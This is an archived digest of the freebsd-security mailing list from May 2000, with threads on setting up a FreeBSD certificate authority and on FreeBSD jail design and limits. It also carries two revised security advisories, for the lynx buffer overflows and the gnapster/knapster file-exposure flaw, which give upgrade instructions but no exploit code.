To: "Duane H. Hesser" Cc: security@FreeBSD.ORG Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Duane H. Hesser wrote: > Sorry to bust in in the middle like this. This is the first message > on this topic I've seen, so I haven't seen the "previous material", > thus the comments/questions below may be irrelevant to the discussion > at hand (if so, please forgive the intrusion). It spilled over from a discussion on -committers which went off-topic. We were talking about the benefits and obstacles to establishing a FreeBSD CA for "project use". > For some time, I have had an interest SDSI (Simple Distributed > Security Infrastructure) by Ronald Rivest and Butler Lampson. It > has a simple elegance which appeals to me, although I have not yet > had much opportunity to work with it. > > Would this infrastructure be of interest in your current discussion? Frankly, there's no shortage of proposals for a public-key infrastructure flying around the internet, so I'm not sure what the particular benefits of this one are :-) Plus, the license on the software disallows commercial use, which means it can't be integrated into FreeBSD as part of a larger infrastructure :-/ Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13:26:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [209.98.143.44]) by hub.freebsd.org (Postfix) with ESMTP id 0AF8A37BCC9; Wed, 17 May 2000 13:26:26 -0700 (PDT) (envelope-from nectar@nectar.com) Received: from bone.nectar.com (bone.nectar.com [10.0.1.105]) by gw.nectar.com (Postfix) with ESMTP id 5AAC09B10; Wed, 17 May 2000 15:26:22 -0500 (CDT) Received: by bone.nectar.com (Postfix, from userid 1001) id B53401DAB; Wed, 17 May 2000 15:26:21 -0500 (CDT) Date: Wed, 17 May 2000 15:26:21 -0500 From: "Jacques A . Vidrine" To: Robert Watson Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? Message-ID: <20000517152621.A48218@bone.nectar.com> References: <20000517110758.C6884@bone.nectar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from rwatson@freebsd.org on Wed, May 17, 2000 at 12:41:49PM -0400 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 17, 2000 at 12:41:49PM -0400, Robert Watson wrote: > Simple, but costly. Imagine for a moment that you have 700 jails on a > single machine, and you'd like to be able to consistently announce to all > admins of all jails that a version upgrade is taking place on 5/16/2000, > and the downtime is one hour :-). I'd rather have a single file system > exported to all jails, saving space and time. For a jail running apache+php+ssl (a fairly complex application), I have ~3.4 MB of files from the base system (35 files). This isn't very large. One need only store the file once per filesystem (hard links). > I didn't have mine tuned quite that much, I just eliminated clearly > unnecessary things (dmesg, ipfw, ifconfig, ...). Clearly what you > eliminate depends a lot on what you want to do with the jail. I think this is backwards ... one should include in the jail only what is needed, rather than eliminate things that are apparently unneeded. > A similar idea for jails would be a possibility, although that only > catches the files that were used, not the files that might be used > :-). Yep, determining all the paths that an arbitrary application might access is NP-complete :-) But I think an excellent start could be generated by looking at what namei translations are done on behalf of a given process. > I'd like to be > able to (effectively) atomically upgrade a jail by shutting down the jail, > umounting its /usr reference, mounting the new /usr reference, and > restarting the jail. Yes, I think this is the best solution if (a) one has dozens of jails, (b) the requirements of all of them are identical, and (c) the number of files that are to be `shared' among the jails is large. e.g. a public access unix system for web hosting or other. I guess in the latter case, one has to be happy with local NFS mounts at the moment, since VFS layering is, I believe, still buggy. -- Jacques Vidrine / n@nectar.com / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13:30:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0DF9437BCE8; Wed, 17 May 2000 13:30:46 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA89882; Wed, 17 May 2000 13:30:46 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 17 May 2000 13:30:45 -0700 (PDT) From: Kris Kennaway To: Garrett Wollman Cc: security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: <200005172017.QAA26098@khavrinen.lcs.mit.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Garrett Wollman wrote: > > The point of a PKI is that you can have a *single* trusted root > > certificate with all others signed by that one in a hierarchy. In order to > > root the tree in something which (e.g.) Netscape browsers will > > automatically understand, we'd need to have at least one key signed by a > > commercial CA (Verisign, Thawte, ..) > > ...who are generally unwilling to sign CA certificates, and when they > are, charge very large sums of money to do so. This is why most Hmm, I didnt think of this. > organizations which use X.509 for internal authentication purposes > run their own CAs and deploy customized Web-browser installations > which come with the appropriate CA certs preinstalled. (My employer, > which owns tens of thousands of computers and has almost as many > employees, does this. People who install the ``latest and greatest'' > browser from wherever don't get support.) We could implement this without too much trouble by shipping the root cert on CD with FreeBSD releases (and having some kind of online distribution method, perhaps signed by a bunch of PGP keys) and instructing people on how to load it into netscape (if it were to be used for https purposes). Perhaps we could even make the netscape port pre-load it - we already have the infrastructure for customizing netscape prior to use. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13:45:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.wzrd.com (mail.wzrd.com [206.99.165.3]) by hub.freebsd.org (Postfix) with ESMTP id 0F64837BD94 for ; Wed, 17 May 2000 13:45:21 -0700 (PDT) (envelope-from danh@wzrd.com) Received: by mail.wzrd.com (Postfix, from userid 91) id 79FDB5D053; Wed, 17 May 2000 16:45:19 -0400 (EDT) Date: Wed, 17 May 2000 16:45:19 -0400 From: Dan Harnett To: "Jacques A . Vidrine" Cc: freebsd-security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? Message-ID: <20000517164519.A79630@mail.wzrd.com> References: <20000517110758.C6884@bone.nectar.com> <20000517152621.A48218@bone.nectar.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000517152621.A48218@bone.nectar.com>; from n@nectar.com on Wed, May 17, 2000 at 03:26:21PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, On Wed, May 17, 2000 at 03:26:21PM -0500, Jacques A . Vidrine wrote: > On Wed, May 17, 2000 at 12:41:49PM -0400, Robert Watson wrote: > > Simple, but costly. Imagine for a moment that you have 700 jails on a > > single machine, and you'd like to be able to consistently announce to all > > admins of all jails that a version upgrade is taking place on 5/16/2000, > > and the downtime is one hour :-). I'd rather have a single file system > > exported to all jails, saving space and time. > > For a jail running apache+php+ssl (a fairly complex application), I > have ~3.4 MB of files from the base system (35 files). This isn't > very large. One need only store the file once per filesystem (hard > links). Isn't there a downside to that as well? Unless the files are read-only, if one jail should get compromised any common shared files could actually lead to holes in the remaining jails. An example being a modified sshd or telnetd. -- Dan Harnett Wizard Communication Systems, Inc. Email: danh@wzrd.com 2 Main Street Phone: (716) 743-0091 Tonawanda, NY 14150 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13:50:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [209.98.143.44]) by hub.freebsd.org (Postfix) with ESMTP id 1EA6037BCD0 for ; Wed, 17 May 2000 13:50:54 -0700 (PDT) (envelope-from nectar@nectar.com) Received: from bone.nectar.com (bone.nectar.com [10.0.1.105]) by gw.nectar.com (Postfix) with ESMTP id BB6AF9B10; Wed, 17 May 2000 15:50:49 -0500 (CDT) Received: by bone.nectar.com (Postfix, from userid 1001) id 67BFC1DAB; Wed, 17 May 2000 15:50:49 -0500 (CDT) Date: Wed, 17 May 2000 15:50:49 -0500 From: "Jacques A . Vidrine" To: Dan Harnett Cc: freebsd-security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? Message-ID: <20000517155049.B48295@bone.nectar.com> Mail-Followup-To: "Jacques A . Vidrine" , Dan Harnett , freebsd-security@freebsd.org References: <20000517110758.C6884@bone.nectar.com> <20000517152621.A48218@bone.nectar.com> <20000517164519.A79630@mail.wzrd.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20000517164519.A79630@mail.wzrd.com>; from danh@wzrd.com on Wed, May 17, 2000 at 04:45:19PM -0400 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 17, 2000 at 04:45:19PM -0400, Dan Harnett wrote: > Isn't there a downside to that as well? Unless the files are read-only, if > one jail should get compromised any common shared files could actually lead to > holes in the remaining jails. An example being a modified sshd or telnetd. The assumption is that the files _are_ read-only, or even better, schg. -- Jacques Vidrine / n@nectar.com / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 14:37: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id B2AC537BCC0; Wed, 17 May 2000 14:36:49 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx [REVISED] Reply-To: security-officer@freebsd.org From: FreeBSD Security Officer Message-Id: <20000517213649.B2AC537BCC0@hub.freebsd.org> Date: Wed, 17 May 2000 14:36:49 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:08 Security Advisory FreeBSD, Inc. Topic: Lynx ports contain numerous buffer overflows Category: ports Module: lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current Announced: 2000-03-15 Revised: 2000-05-17 Affects: Ports collection before the correction date. Corrected: 2000-04-16 [lynx-current] 2000-04-21 [lynx] FreeBSD only: NO I. Background Lynx is a popular text-mode WWW browser, available in several versions including SSL support and Japanese language localization. II. Problem Description Versions of the lynx software prior to version 2.8.3pre.5 were written in a very insecure style and contain numerous potential and several proven security vulnerabilities (publicized on the BugTraq mailing list) exploitable by a malicious server. The lynx ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 3200 third-party applications in a ready-to-install format. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact A malicious server which is visited by a user with the lynx browser can exploit the browser security holes in order to execute arbitrary code as the local user. If you have not chosen to install any of the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then your system is not vulnerable. IV. Workaround Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you you have installed them. V. Solution Upgrade to lynx or lynx-current after the correction date. After the initial release of this advisory, the Lynx development team conducted an audit of the source code, and have corrected the known vulnerabilities in lynx as well as increasing the robustness of the string-handling code. As of lynx-2.8.3pre.5, we consider it safe enough to use again. Note that there may be undiscovered vulnerabilities remaining in the code, as with all software - but should any further vulnerabilities be discovered a new advisory will be issued. At this time the lynx-ssl/ja-lynx/ja-lynx-current ports are not yet updated to a safe version of lynx: this advisory will be reissued again once they are. 1) Upgrade your entire ports collection and rebuild the lynx or lynx-current port. 2) Reinstall a lynx new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/lynx-2.8.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/lynx-2.8.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/lynx-2.8.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/lynx-2.8.3.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/lynx-2.8.3.1.tgz Note that the lynx-current port is not automatically built as a package. 3) download a new port skeleton for the lynx/lynx-current port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz VI. Revision History v1.0 2000-03-15 Initial release v1.1 2000-05-17 Update to note fix of lynx and lynx-current ports. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOSMQT1UuHi5z0oilAQHlgwP9EiLqvf8MM55fvftEXPMfL6PJ6HFQPYMH +TqX5Q/P9s0mgBFiGfN8wblmtEUyZ1GwF8goPa9fqqJIfNg8Qu2zWqJOYPjc20hW yo3Rxbi+lEWOYxLpxBKDhvBH7yWxiV8Nm1+w73a76BjaZ20E0b91hgw2lebFiZPi uzK38WjnFNQ= =qWEC -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 14:40: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 2DC8137BCDE; Wed, 17 May 2000 14:39:50 -0700 (PDT) From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-00:18.gnapster [REVISED] Reply-To: security-officer@freebsd.org From: FreeBSD Security Officer Message-Id: <20000517213950.2DC8137BCDE@hub.freebsd.org> Date: Wed, 17 May 2000 14:39:50 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:18 Security Advisory FreeBSD, Inc. Topic: gnapster/knapster ports allows remote users to view local files Category: ports Module: gnapster/knapster Announced: 2000-05-09 Reissued: 2000-05-16 Credits: Fixed by vendor. Knapster vulnerability pointed out by: Tom Daniels via BugTraq Affects: Ports collection. Corrected: 2000-04-29 (gnapster) 2000-05-01 (knapster) Vendor status: Updated version released. FreeBSD only: NO I. Background Gnapster and knapster are clients for the Napster file-sharing network. II. Problem Description The gnapster port (version 1.3.8 and earlier), and the knapster port (version 0.9 and earlier) contain a vulnerability which allows remote napster users to view any file on the local system which is accessible to the user running gnapster/knapster. Gnapster and knapster do not run with elevated privileges, so it is only the user's regular filesystem access permissions which are involved. Note that there may be further undiscovered bugs in these and other napster clients leading to a similar vulnerability. System administrators and users should exercise discretion in installing a napster client on their system. The gnapster/knapster ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 3200 third-party applications in a ready-to-install format. The ports collection shipped with FreeBSD 4.0 contains this problem since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Remote users can view files accessible to the user running the gnapster/knapster client. If you have not chosen to install a napster client, then your system is not vulnerable to this problem. IV. Workaround Deinstall the gnapster and/or knapster port/package, if you you have installed them. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the gnapster and/or knapster port. 2) Reinstall a new package dated after the correction date, obtained from: [gnapster] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/gnapster-1.3.9.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/gnapster-1.3.9.tgz [knapster] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/audio/knapster-0.10.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/knapster-0.10.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/knapster-0.10.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/knapster-0.10.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/knapster-0.10.tgz 3) download a new port skeleton for the gnapster/knapster ports from: http://www.freebsd.org/ports/ and use it to rebuild the port(s). 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.freebsd.org/pub/FreeBSD/ports/packages/devel/portcheckout-1.0.tgz VI. Revision History v1.0 2000-05-09 Initial release v1.1 2000-05-16 Update to note that knapster 0.9 is also vulnerable and broaden warning to include all napster clients. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOSMRPVUuHi5z0oilAQHclAP/X+2Xdki6PUEZ/fCHdwZTLEC0kQNenOJ9 oWxWFuI4z3jpylQ3CweIoo9akx32ZzyIVHTViG3mF2BC+NRQShl1aXu2MYqy6vKc c4R+oHxx2OeYSQo4Q8rS8Ttxa543ynXg9wLBL0vtGMq07GtVYTXpg1+Ooi+QKe2o 9JMpcxAohAQ= =2iHQ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 14:42:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 8DB1D37BCBB; Wed, 17 May 2000 14:42:14 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id RAA25744; Wed, 17 May 2000 17:42:05 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Wed, 17 May 2000 17:42:05 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Kris Kennaway Cc: Garrett Wollman , security@FreeBSD.org, Darren Reed , Peter Wemm Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Kris Kennaway wrote: > On Wed, 17 May 2000, Garrett Wollman wrote: > > > organizations which use X.509 for internal authentication purposes > > run their own CAs and deploy customized Web-browser installations > > which come with the appropriate CA certs preinstalled. (My employer, > > which owns tens of thousands of computers and has almost as many > > employees, does this. People who install the ``latest and greatest'' > > browser from wherever don't get support.) > > We could implement this without too much trouble by shipping the root cert > on CD with FreeBSD releases (and having some kind of online distribution > method, perhaps signed by a bunch of PGP keys) and instructing people on > how to load it into netscape (if it were to be used for https purposes). > Perhaps we could even make the netscape port pre-load it - we already have > the infrastructure for customizing netscape prior to use. The typical cheap-skate response to other CA's being expensive is to get an SSL cert from Thawte or Verisign, and distributed your certs via a web ste hosted using that well-known CA. You don't get the automated cert evaluation, but can provide a trusted path for cert retrieval. In a prior e-mail, someone raised that doing a full secure facility is not necessary given the size of the project. It's useful to understand who will be relying on these keys as a means of evaluating the need for doing the "CA" thing properly: 1) Is it just the committers? (small community that can forgive mistakes) 2) Is it committers + developers? (larger and less forgiving community) 3) Is it the general user population? (extrmely large community with their jobs and businesses on the line) In addition, how will the certs be used? 1) For manual verification and retrieval only? 2) For automated installation of security patches? My assertion is that if we begin distributing software in a signed way, we need to do it right. This means signing all release announcements, signing md5 checksum sets over releases, signing security updates that can be installed using a binary installer, etc. We also need to understand that in more and more places, digital signatures now have legal connotations. Are we accepting more responsibility by signing things in these places? Do we become more liable? Hopefully the answer on this front is no, but it is important that we be sure. Similarly, if we start signing things, people will assume they can have greater confidence when installing over the network, et al. Is this true? Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 14:53:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 5517737BD1A; Wed, 17 May 2000 14:53:16 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id OAA09714; Wed, 17 May 2000 14:53:15 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id OAA30127; Wed, 17 May 2000 14:53:14 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id OAA01533; Wed, 17 May 2000 14:53:13 -0700 (PDT) From: Don Lewis Message-Id: <200005172153.OAA01533@salsa.gv.tsc.tdk.com> Date: Wed, 17 May 2000 14:53:13 -0700 In-Reply-To: References: X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98) To: Robert Watson , Geoffrey Robinson Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 16, 1:05pm, Robert Watson wrote: } Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? } On Mon, 15 May 2000, Geoffrey Robinson wrote: } > aware that raw sockets are not allowed to jailed processes but is there } > a workaround for ping and traceroute? } } Currently, no. Due to the way raw sockets work (allowing listening for } all non-handled IP messages, and allowing direct writing of IP packets), } it would take a bit of work to get this up and running, although it would } be feasible. A more promising long-term goal might be to better } virtualize network services, creating virtual interfaces and binding real } network resources to virtual interfaces. I think this is the right way to go. The current jail implementation is not compatible with IPv6, and there is no way to confine a dual homed proxy server to a jail, since the jail is only allowed one IP address. If the jail used virtual network interfaces, then it would be possible to add packet filter rules to these network interfaces. This would be much more flexible than the current implementation, since it would then be possible to have fine grained control over the network connections allowed into and out of the jail. It would also be possible for multiple jails to share the same IP address but be restricted to disjoint port ranges. } > Finally how secure is jail really? I'm aware of a trivial chroot breakout } > technique. Does that hole still exist? Are there any other known holes? Is } > jail still under active development? Is it worth the trouble to do any of } > this? } Right now my efforts are primarily aimed at improving the security } abstractions within the kernel relating to the TrustedBSD project--this } should have a side benefit of improving the relationship between jail() } and the base OS, making Jail easier to maintain and modify. I think this is also the right thing to do. I would go so far as to deprecate the jail(2) syscall, and implement jail(8) in terms of the syscalls to set up the virtual network interfaces, the syscalls to set the process capabilities, and chroot(). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 15: 2:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id D6A5A37BDB3; Wed, 17 May 2000 15:02:34 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from imap.gv.tsc.tdk.com (imap.gv.tsc.tdk.com [192.168.241.198]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id PAA09830; Wed, 17 May 2000 15:02:34 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by imap.gv.tsc.tdk.com (8.9.3/8.9.3) with ESMTP id PAA30169; Wed, 17 May 2000 15:02:33 -0700 (PDT) (envelope-from Don.Lewis@tsc.tdk.com) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id PAA01574; Wed, 17 May 2000 15:02:33 -0700 (PDT) From: Don Lewis Message-Id: <200005172202.PAA01574@salsa.gv.tsc.tdk.com> Date: Wed, 17 May 2000 15:02:33 -0700 In-Reply-To: References: X-Mailer: Mail User's Shell (7.2.6 beta(5) 10/07/98) To: Robert Watson Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 17, 11:05am, Robert Watson wrote: } Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? } One way to substantially improve jail scalability would be to allow the } same (read-only) file system to be present in all jails as the root, with } only jail-local data being modified. You can imagine gratuitously using } nullfs (if it worked) to do this, and mount per-jail writable fs's for } appropriatel subdirectories (/etc, /usr/local, /home) with appropriate } symlinks within the jail. I badly want nullfs for another reason. It can be really handy to allow separate jails to communicate through the filesystem. Imagine updating a set of web pages using rsync over ssh in one jail, and sharing these via a read-only mount in another jail where the web server is running. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 15:49:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from falcon.grobin.org (falcon.grobin.org [204.225.173.44]) by hub.freebsd.org (Postfix) with ESMTP id 05ECD37B610; Wed, 17 May 2000 15:49:03 -0700 (PDT) (envelope-from geoff@grobin.org) Received: by falcon.grobin.org (Postfix, from userid 1000) id F326D2D5; Wed, 17 May 2000 18:51:04 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by falcon.grobin.org (Postfix) with ESMTP id ECBC4ED; Wed, 17 May 2000 18:51:04 -0400 (EDT) Date: Wed, 17 May 2000 18:51:04 -0400 (EDT) From: Geoffrey Robinson To: Robert Watson Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Robert Watson wrote: > > If a process running in the host system created a UNIX domain socket or > > named pipe within the jail directory tree. Would a process running in the > > jail be able to connect to and communicate with the host process through > > this socket or pipe? If so I guess you could create work around for just > > about anything by running it on the host system. Would this create a > > potential way of defeating the jail? > > Jail works by: > > 1) Chrooting the child process > 2) Limiting the scope of superuser privileges accessible by uid0 processes > in the jail > > It does not attempt to prevent processes outside the jail from > communicating with processes within the jail. As such, having a process > do so wouldn't defeat the jail per se, but would defeat the purpose of the > jail :-). Still, like any network service the security impact would depend on how well the server application was written not on the fact you have a link to the host system. Right? > I'm not clear on why that would happen -- the libc (etc, etc) in each jail > should be kept in synch with the kernel, however, and that could be source > of your problems. I.e., if you upgrade the kernel, it exports the same > syscall interface to all processes, regardless of jails, so all jails > making use of syscalls that have changed need to be upgraded in synch. > > This is the same as upgrading the kernel without upgrading your normal > world. > > One way to substantially improve jail scalability would be to allow the > same (read-only) file system to be present in all jails as the root, with > only jail-local data being modified. You can imagine gratuitously using > nullfs (if it worked) to do this, and mount per-jail writable fs's for > appropriatel subdirectories (/etc, /usr/local, /home) with appropriate > symlinks within the jail. Right now, each jail costs you the size of > world, and is hard to upgrade if you have any decent number of jails. > Storing all that stuff in a single tree mapped read-only into jails would > solve that (you'd probably want two so you could upgrade one, test it, and > then swap to that for all jails so as to minimize downtime). If I wanted to do that. Would it be as easy as building a jail on a spare partition then mounting it read-only to the correct locations? ------------------------------------------------------------------------------ | Geoffrey Robinson - geoff@grobin.org | ------------------------------------------------------------------------------ Random Fortune Quote "What's another word for Thesaurus?" -- Steven Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 22:14: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from androcles.com (androcles.com [204.57.240.10]) by hub.freebsd.org (Postfix) with ESMTP id A3C4E37B685; Wed, 17 May 2000 22:13:53 -0700 (PDT) (envelope-from alex@androcles.com) Received: (from dhh@localhost) by androcles.com (8.9.3/8.9.3) id WAA03159; Wed, 17 May 2000 22:13:44 -0700 (PDT) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit MIME-Version: 1.0 In-Reply-To: Date: Wed, 17 May 2000 22:13:44 -0700 (PDT) From: "Duane H. Hesser" To: Robert Watson Subject: Re: HEADS UP: New host key for freefall! Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 17-May-00 Robert Watson wrote: > On Wed, 17 May 2000, Kris Kennaway wrote: > >> On Wed, 17 May 2000, Garrett Wollman wrote: >> >> > organizations which use X.509 for internal authentication purposes >> > run their own CAs and deploy customized Web-browser installations >> > which come with the appropriate CA certs preinstalled. (My employer, >> > which owns tens of thousands of computers and has almost as many >> 